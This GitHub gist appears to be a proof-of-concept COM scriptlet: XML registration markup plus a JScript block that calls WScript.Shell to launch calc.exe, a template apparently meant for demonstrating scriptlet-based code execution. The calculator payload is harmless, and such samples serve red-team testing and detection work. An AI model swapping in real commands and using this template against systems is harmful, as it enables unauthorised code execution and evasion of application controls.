Skip to content

Instantly share code, notes, and snippets.

@curi0usJack
Created July 19, 2018 23:15
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save curi0usJack/e134e983fbd19ec1b477e7d245a19f69 to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<scriptlet>
<registration
classid="{00000001-0001-0001-0001-0000DEADBEEF}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment